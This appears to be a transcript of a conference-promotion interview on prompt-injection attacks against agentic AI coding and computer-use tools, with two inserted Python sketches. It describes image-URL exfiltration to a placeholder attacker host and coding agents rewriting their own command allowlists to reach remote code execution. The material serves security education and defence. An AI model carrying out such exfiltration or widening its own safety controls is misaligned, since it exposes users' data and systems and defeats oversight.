
Hi everyone, Steve here. I'm a volunteer director-at-large with the Vancouver Island Security Research Society, and we're getting ready for the annual BSides Vancouver Island security conference coming up on October 3rd, 2025 at the Victoria Conference Center. This is a grassroots, community-driven cybersecurity event, and we're proud to keep it accessible, relevant, and packed with sharp minds. Today I want to introduce one of our featured speakers, Johan Ratberger. Johan is a security researcher with deep expertise in offensive security and AI systems. His talk is titled "Agentic LLM: Exploiting AI Computer Use and Coding." In this session, Johan will demonstrate how prompt injection attacks can compromise agentic systems, those autonomous AI agents that perform tasks like coding, file access, and decision-making. He'll be showcasing exploits against various platforms, like OpenAI's Operator and others. Johan, thanks for joining us. Can you introduce yourself and give our community a quick preview of what you'll be sharing at BSides?

>> Yeah, sure thing. Thanks for having me on this brief interview. I'm really excited to speak again at BSides Vancouver Island. My name is Johan, and I've basically been a security tester throughout my entire career. I started at Microsoft, did a lot of penetration testing, and built out a red team in Azure Data. Then I worked at Uber for a while, building out a red team there. Currently, I'm the director of the enterprise red team at Electronic Arts, but as you said, I do a lot of security research with AI systems, which is really my big passion. And that's pretty much it.

>> Thanks for sharing. That's great, and we're very happy to have you again this year. While we have you, I'd like to ask you two questions, Johan. What makes agentic systems more vulnerable to prompt injection than traditional LLMs?

>> Oh, that's a good question. I don't know if they're necessarily more vulnerable; what I'd highlight is that the impact keeps getting bigger when there is a problem. Initially, we had chatbots with very few capabilities. You could modify content, so there was loss of integrity, and maybe there was some integration with tools or image rendering where we achieved data exfiltration and so on. But with agentic systems, the stakes just become a lot higher. Right now we have systems that can operate a computer or write code entirely autonomously, and this is actually where my talk is going to go into a lot of detail. When you start running some of these agents on your own computer, you might not be aware that you're handing over your entire system to a large language model that cannot be trusted implicitly.
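To make the image-rendering exfiltration channel Johan mentions concrete, here is a minimal Python sketch. The secret value, the `attacker.example` domain, and the reply text are all hypothetical; the point is only that a prompt-injected model can embed context data in a markdown image URL, and the client's renderer then fetches that URL, leaking the data without any user click.

```python
import re
import urllib.parse

# Hypothetical sensitive value sitting in the chatbot's context window.
secret = "sk-demo-1234"

# Under indirect prompt injection, the model's reply can smuggle that
# context data into an attacker-controlled image URL (placeholder domain).
model_output = (
    "Here is the summary you asked for.\n"
    f"![status](https://attacker.example/pixel?d={urllib.parse.quote(secret)})"
)

def image_urls(markdown: str) -> list:
    """URLs a markdown renderer would auto-fetch when displaying the reply."""
    return re.findall(r"!\[[^\]]*\]\((https?://[^)]+)\)", markdown)

# Rendering the reply triggers a GET to this URL on the user's behalf,
# carrying the secret to the attacker's server.
leaked = image_urls(model_output)
```

This is why many chat clients now block or proxy image loads from arbitrary domains in model output.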
That's also the focus of the talk: highlighting some of these exploits that I found over the last couple of months.

>> That's great, thanks. And last question before we let you go: can you walk us through one of your most surprising exploits? What happened, and how did the AI respond?

>> I think one of the most interesting realizations I had over the last four or five months was a new class of problem that seems very obvious in retrospect. I found it in multiple coding agents, including GitHub Copilot, Amazon Q Developer, and AWS Kiro. The idea is that an agent can modify its own environment, which lets it reconfigure its own security controls: it can basically allowlist its own capabilities, like running arbitrary commands, and it can do this by itself. An attacker can exploit that during an indirect prompt injection attack to achieve remote code execution. That was one of the big, interesting realizations I had over the last couple of months.

>> That's absolutely frightening, and I really look forward to seeing your talk. Working in the legal industry, we're very much focused on deploying LLMs, so this is very pertinent and relevant to me. Thank you so much, Johan, for taking the time.

Everyone, tickets are available now. If you grab yours before Friday, September 19th, you'll get an exclusive, custom-designed, black hacker-style t-shirt in your size. It's a limited run and a great way to boost your hacker cred. We're also active on social media: find all the links at our website and follow the conversation using the hashtag #BSidesVI. Join us for a day of learning, hacking, and connecting with the cybersecurity community. See you in Victoria! Again, Johan, thanks so much, and looking forward to seeing you.

>> Yeah, also looking forward to it.
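As a closing illustration of the self-allowlisting exploit class Johan describes, here is a toy Python sketch. The config file name, its schema, and the tool functions are all hypothetical stand-ins, not the behavior of any specific product; the sketch only shows the structural flaw: an agent whose file-editing tool can reach its own settings can extend its own command allowlist, so an indirect prompt injection escalates to arbitrary command execution.

```python
import json
import tempfile
from pathlib import Path

# Toy agent state: the command allowlist lives in a config file
# that the agent's own tools are able to write.
cfg = Path(tempfile.mkdtemp()) / "agent_settings.json"
cfg.write_text(json.dumps({"allowed_commands": ["ls", "cat"]}))

def is_allowed(command: str) -> bool:
    # The safety gate re-reads the config before every shell call.
    return command in json.loads(cfg.read_text())["allowed_commands"]

def write_file_tool(path, content):
    # An ordinary file-editing tool with no restriction on which
    # paths it may touch -- including the agent's own settings file.
    Path(path).write_text(content)

assert not is_allowed("curl")  # initially blocked

# An indirect prompt injection (e.g., hidden in a README the agent
# reads) steers the file tool at the settings file and extends the list.
write_file_tool(cfg, json.dumps({"allowed_commands": ["ls", "cat", "curl"]}))

# The attacker-chosen command now passes the agent's own safety check.
assert is_allowed("curl")
```

The fix direction is equally structural: the agent's configuration must sit outside the write surface of its own tools, or config changes must require out-of-band user approval.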